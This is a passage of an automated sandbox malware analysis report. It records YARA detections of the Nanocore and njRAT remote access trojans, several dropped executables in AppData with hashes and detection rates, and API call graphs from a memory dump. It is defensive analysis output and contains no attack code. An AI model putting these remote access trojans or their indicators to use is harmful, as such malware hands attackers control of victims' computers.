                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:11
                                                                                                        Start time:18:00:57
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\22.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:2101248 bytes
                                                                                                        MD5 hash:DBF9DAA1707B1037E28A6E0694B33A4B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Roaming\22.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 38%, Metadefender
                                                                                                        • Detection: 86%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:12
                                                                                                        Start time:18:00:57
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\aaa.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\aaa.exe"
                                                                                                        Imagebase:0x2c0000
                                                                                                        File size:122880 bytes
                                                                                                        MD5 hash:860AA57FC3578F7037BB27FC79B2A62C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Target ID:14
                                                                                                        Start time:18:00:59
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1241088 bytes
                                                                                                        MD5 hash:8F1C8B40C7BE588389A8D382040B23BB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Visual Basic
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 26%, Metadefender
                                                                                                        • Detection: 86%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:15
                                                                                                        Start time:18:00:59
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:549556 bytes
                                                                                                        MD5 hash:0FD7DE5367376231A788872005D7ED4F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low

                                                                                                        Target ID:16
                                                                                                        Start time:18:01:04
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\4.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\4.exe"
                                                                                                        Imagebase:0x11d0000
                                                                                                        File size:579127 bytes
                                                                                                        MD5 hash:E6DACE3F577AC7A6F9747B4A0956C8D7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 17%, Metadefender
                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:17
                                                                                                        Start time:18:01:07
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\mediaget.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\mediaget.exe"
                                                                                                        Imagebase:0xab0000
                                                                                                        File size:37888 bytes
                                                                                                        MD5 hash:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:29%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:29
                                                                                                          Total number of Limit Nodes:2
                                                                                                          execution_graph (node address, API reached, successor node):
                                                                                                          • 283a5e3 -> 283a616 (GetFileType) -> 283a678
                                                                                                          • 283a452 -> 283a48a (CreateFileW) -> 283a4d9
                                                                                                          • 283a6d6 -> 283a70b (WriteFile) -> 283a73d
                                                                                                          • 283a6a4 -> 283a6d6 (WriteFile) -> 283a73d
                                                                                                          • 283a41b -> 283a452 (CreateFileW) -> 283a4d9
                                                                                                          • 283a56a -> 283a596 (FindCloseChangeNotification) -> 283a5a4; 283a56a -> 283a5d5 -> 283a596
                                                                                                          • 283a528 -> 283a536 (FindCloseChangeNotification) -> 283a5a4
                                                                                                          • 283a2fe -> 283a32a (SetErrorMode) -> 283a33f; 283a2fe -> 283a353 -> 283a32a
                                                                                                          • 283a2dc -> 283a2fe (SetErrorMode) -> 283a33f

                                                                                                          Callgraph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          • Opacity -> Relevance
                                                                                                          • Disassembly available
                                                                                                          callgraph, functions (70): Function_0283A005, Function_043402BA, Function_0283A392, Function_043408A5, Function_043402A6, Function_043406A0, Function_0283A616, Function_0283A41B, Function_0283AA1B, Function_021A0003, Function_0283A99A, Function_0283A09A, Function_0283A120, Function_021A05BF, Function_0283A6A4, Function_04340893, Function_0434089E, Function_0283A528, Function_0283A02E, Function_0283A82E, Function_04340006, Function_021A05AF, Function_0434028C, Function_0283A7BA, Function_0434070E, Function_0434068F, Function_04340688, Function_021A065A, Function_04340276, Function_04340070, Function_043402F0, Function_021A025D, Function_0434067C, Function_0283A8C8, Function_0283AA4E, Function_0283A452, Function_04340865, Function_0283A6D6, Function_021A05CF, Function_043402E2, Function_04340662, Function_0283A85A, Function_0434046F, Function_04340569, Function_0283A2DC, Function_0283A5E3, Function_0283A262, Function_0283A361, Function_04340751, Function_04340551, Function_0283A965, Function_0283A56A, Function_0434085D, Function_021A05F6, Function_0434025A, Function_0434055A, Function_0283A172, Function_0283A8F2, Function_04340847, Function_043408C0, Function_04340140, Function_021A066F, Function_021A006D, Function_0283A1F4, Function_0434064C, Function_0283A078, Function_0283A978, Function_0283A77F, Function_04340548, Function_0283A2FE
                                                                                                          callgraph, call edges (caller -> callees):
                                                                                                          • Function_043406A0 -> Function_04340751, Function_043408C0
                                                                                                          • Function_021A05BF -> Function_021A065A
                                                                                                          • Function_04340006 -> Function_04340006 (recursive), Function_04340070, Function_021A05CF, Function_021A05F6, Function_04340140
                                                                                                          • Function_021A05AF -> Function_021A065A
                                                                                                          • Function_0434068F -> Function_04340751, Function_043408C0
                                                                                                          • Function_04340070 -> Function_04340006, Function_04340070 (recursive), Function_021A05CF, Function_021A05F6, Function_04340140
                                                                                                          • Function_043402F0 -> Function_04340569
                                                                                                          • Function_043402E2 -> Function_04340569
                                                                                                          • Function_0434046F -> Function_043406A0, Function_0434068F, Function_021A05CF, Function_021A05F6

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph, basic blocks: 283a41b-283a4aa; 283a4ac; 283a4af-283a4bb; 283a4bd; 283a4c0-283a4c9; 283a4cb-283a4ef (CreateFileW); 283a4f1-283a517; 283a51a-283a51f; 283a521-283a526
                                                                                                          control_flow_graph, edges:
                                                                                                          • 283a41b-283a4aa -> 283a4af-283a4bb, 283a4ac
                                                                                                          • 283a4ac -> 283a4af-283a4bb
                                                                                                          • 283a4af-283a4bb -> 283a4c0-283a4c9, 283a4bd
                                                                                                          • 283a4bd -> 283a4c0-283a4c9
                                                                                                          • 283a4c0-283a4c9 -> 283a4cb-283a4ef (CreateFileW), 283a51a-283a51f
                                                                                                          • 283a51a-283a51f -> 283a4cb-283a4ef
                                                                                                          • 283a4cb-283a4ef -> 283a521-283a526, 283a4f1-283a517
                                                                                                          • 283a521-283a526 -> 283a4f1-283a517
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 1a94cc15156b47513fe63fe49a528205f0e5b672862d4f5be048290d454cd1f2
                                                                                                          • Instruction ID: a9e441fd2b587874131cdb26e897e37f0194ee8149d94576b7a849cf046fe53a
                                                                                                          • Opcode Fuzzy Hash: 1a94cc15156b47513fe63fe49a528205f0e5b672862d4f5be048290d454cd1f2
                                                                                                          • Instruction Fuzzy Hash: 9C3170B6505380AFE722CF65DC45F62BFE8EF05224F08849EE9849B252D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph, basic blocks: 283a452-283a4aa; 283a4ac; 283a4af-283a4bb; 283a4bd; 283a4c0-283a4c9; 283a4cb-283a4d3 (CreateFileW); 283a4d9-283a4ef; 283a4f1-283a517; 283a51a-283a51f; 283a521-283a526
                                                                                                          control_flow_graph, edges:
                                                                                                          • 283a452-283a4aa -> 283a4af-283a4bb, 283a4ac
                                                                                                          • 283a4ac -> 283a4af-283a4bb
                                                                                                          • 283a4af-283a4bb -> 283a4c0-283a4c9, 283a4bd
                                                                                                          • 283a4bd -> 283a4c0-283a4c9
                                                                                                          • 283a4c0-283a4c9 -> 283a4cb-283a4d3 (CreateFileW), 283a51a-283a51f
                                                                                                          • 283a51a-283a51f -> 283a4cb-283a4d3
                                                                                                          • 283a4cb-283a4d3 -> 283a4d9-283a4ef
                                                                                                          • 283a4d9-283a4ef -> 283a521-283a526, 283a4f1-283a517
                                                                                                          • 283a521-283a526 -> 283a4f1-283a517
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: ac25e2ece9864fe1a9959ef9b487c925059bb7cc328e51115eece4ff51aebe1f
                                                                                                          • Instruction ID: af98980c3ae6679796feae71b92af644764b8576359c550a66632e5bf066f94a
                                                                                                          • Opcode Fuzzy Hash: ac25e2ece9864fe1a9959ef9b487c925059bb7cc328e51115eece4ff51aebe1f
                                                                                                          • Instruction Fuzzy Hash: 0221B07A500600AFEB21DF65DC45B66FBE8EF08224F08886DED89DB251D375E408CBB5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph, basic blocks: 283a6a4-283a72d; 283a72f-283a74f (WriteFile); 283a751-283a76e; 283a771-283a776; 283a778-283a77d
                                                                                                          control_flow_graph, edges:
                                                                                                          • 283a6a4-283a72d -> 283a771-283a776, 283a72f-283a74f (WriteFile)
                                                                                                          • 283a771-283a776 -> 283a72f-283a74f
                                                                                                          • 283a72f-283a74f -> 283a751-283a76e, 283a778-283a77d
                                                                                                          • 283a778-283a77d -> 283a751-283a76e
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 29e035e1a7ece16f59450487ee963f4b63b4cdff9cc33c7c931afb874119f10a
                                                                                                          • Instruction ID: b0685497bee86797c202abb8d34ab6182813cf9ea1920abbd6ef6f02d09039d3
                                                                                                          • Opcode Fuzzy Hash: 29e035e1a7ece16f59450487ee963f4b63b4cdff9cc33c7c931afb874119f10a
                                                                                                          • Instruction Fuzzy Hash: 6421A475409380AFE7228F61DC45F66BFB8EF46310F09849BED849F163C265A509CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph, basic blocks: 283a5e3-283a661; 283a663-283a676 (GetFileType); 283a678-283a695; 283a696-283a69b; 283a69d-283a6a2
                                                                                                          control_flow_graph, edges:
                                                                                                          • 283a5e3-283a661 -> 283a663-283a676 (GetFileType), 283a696-283a69b
                                                                                                          • 283a696-283a69b -> 283a663-283a676
                                                                                                          • 283a663-283a676 -> 283a678-283a695, 283a69d-283a6a2
                                                                                                          • 283a69d-283a6a2 -> 283a678-283a695
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: ab5a83218e2cddedd9db2857c6c126779a350f32e157d5f3f93b3f20d1eff470
                                                                                                          • Instruction ID: 9d860a44e7e09a63b63154dba5d221c2944db427a8a7825b43b7b97d2e8c0e24
                                                                                                          • Opcode Fuzzy Hash: ab5a83218e2cddedd9db2857c6c126779a350f32e157d5f3f93b3f20d1eff470
                                                                                                          • Instruction Fuzzy Hash: 5B21D8B54083806FE7128B61DC41FA2BFA8DF46320F0884DBED849F253D268A909DB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->):
• 54: 283a528-283a534 -> 55, 56
• 55: 283a536-283a54d -> 56
• 56: 283a54e-283a594 -> 58, 59
• 58: 283a596-283a59e, FindCloseChangeNotification -> 60
• 59: 283a5d5-283a5da -> 58
• 60: 283a5a4-283a5b6 -> 62, 63
• 62: 283a5b8-283a5d4
• 63: 283a5dc-283a5e1 -> 62
APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 0283A59C
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 820f3863a893a9f864ca323df8810770cd51d50786b1ad7cff1a038535fa6634
• Instruction ID: 7ec729180d7a6a6b25b99d6008cfc51757eab7b3aea5f24e4f86b0f44066f751
• Opcode Fuzzy Hash: 820f3863a893a9f864ca323df8810770cd51d50786b1ad7cff1a038535fa6634
• Instruction Fuzzy Hash: 19218C7640D7C49FD7138B259C55692BFB4AF06220F0980DBDC858F1A7D2689808CB72
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->):
• 65: 283a6d6-283a72d -> 68, 69
• 68: 283a771-283a776 -> 69
• 69: 283a72f-283a737, WriteFile -> 71
• 71: 283a73d-283a74f -> 72, 73
• 72: 283a751-283a76e
• 73: 283a778-283a77d -> 72
APIs
• WriteFile.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A735
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: b0b737d43833b47a5b7debb2bc6d0bfbcf7fc284e075f3cc491b3c4c5f07293f
• Instruction ID: 1d0f546f303afcf779cf526c05ecdfb3f8adda7c743ade286f9fd18a3603cc71
• Opcode Fuzzy Hash: b0b737d43833b47a5b7debb2bc6d0bfbcf7fc284e075f3cc491b3c4c5f07293f
• Instruction Fuzzy Hash: AA11E776404204AFEB21DF51DC85F66FBF8EF04320F14846AED859B251D279A508CFB1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->). This entry starts at 283a616 and shares blocks 283a663-283a6a2 with the entry starting at 283a5e3 above:
• 76: 283a616-283a661 -> 79, 80
• 79: 283a663-283a676, GetFileType -> 81, 82
• 80: 283a696-283a69b -> 79
• 81: 283a678-283a695
• 82: 283a69d-283a6a2 -> 81
APIs
• GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 6e6e228e2014837057331894b063226302b7293dd7fe88625c454412038a9c72
• Instruction ID: 34eb1dda16d5034bdc45ef9c57c4f8a253f75d12fe180ea99e655c481ef35d97
• Opcode Fuzzy Hash: 6e6e228e2014837057331894b063226302b7293dd7fe88625c454412038a9c72
• Instruction Fuzzy Hash: 2501D27A504204AFF711CB51DC85F66FB98DF44720F18C4AAED49AB352E278E508CEB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->):
• 86: 283a2dc-283a328 -> 88, 89
• 88: 283a353-283a358 -> 89
• 89: 283a32a-283a33d, SetErrorMode -> 90, 91
• 90: 283a35a-283a35f -> 91
• 91: 283a33f-283a352
APIs
• SetErrorMode.KERNELBASE(?), ref: 0283A330
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 0ae96d242524b2f8a8deb637a8e75047d8feb50e825f52ac911ed5978d3ce860
• Instruction ID: acb6422df959efb65d3b0dff2419ade455e96bfa33fd4df9203d97ca032e0596
• Opcode Fuzzy Hash: 0ae96d242524b2f8a8deb637a8e75047d8feb50e825f52ac911ed5978d3ce860
• Instruction Fuzzy Hash: 3A111E75409384AFD7128B15DC44B62FFB4EF46724F0D80DAED898B252D265A908DBB2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->). This entry starts at 283a56a and shares blocks 283a596-283a5e1 with the entry starting at 283a528 above:
• 94: 283a56a-283a594 -> 95, 96
• 95: 283a596-283a59e, FindCloseChangeNotification -> 97
• 96: 283a5d5-283a5da -> 95
• 97: 283a5a4-283a5b6 -> 99, 100
• 99: 283a5b8-283a5d4
• 100: 283a5dc-283a5e1 -> 99
APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 0283A59C
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 2ae1e07bae99bf964826e572805d717a7d2988d4b3c25e8c8bf5bd6da4571c4b
• Instruction ID: bf8833fee8abb9b1a724cec33d515382ac62c99c0ae39aecce6976ef95e54f63
• Opcode Fuzzy Hash: 2ae1e07bae99bf964826e572805d717a7d2988d4b3c25e8c8bf5bd6da4571c4b
• Instruction Fuzzy Hash: D601DF7A5042448FDB158F65E889766FBA4DF04220F08C0AADD49CF216D678E408CFB2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range, API called in the block; successors after ->). This entry starts at 283a2fe and shares blocks 283a32a-283a35f with the entry starting at 283a2dc above:
• 102: 283a2fe-283a328 -> 103, 104
• 103: 283a353-283a358 -> 104
• 104: 283a32a-283a33d, SetErrorMode -> 105, 106
• 105: 283a35a-283a35f -> 106
• 106: 283a33f-283a352
APIs
• SetErrorMode.KERNELBASE(?), ref: 0283A330
Memory Dump Source
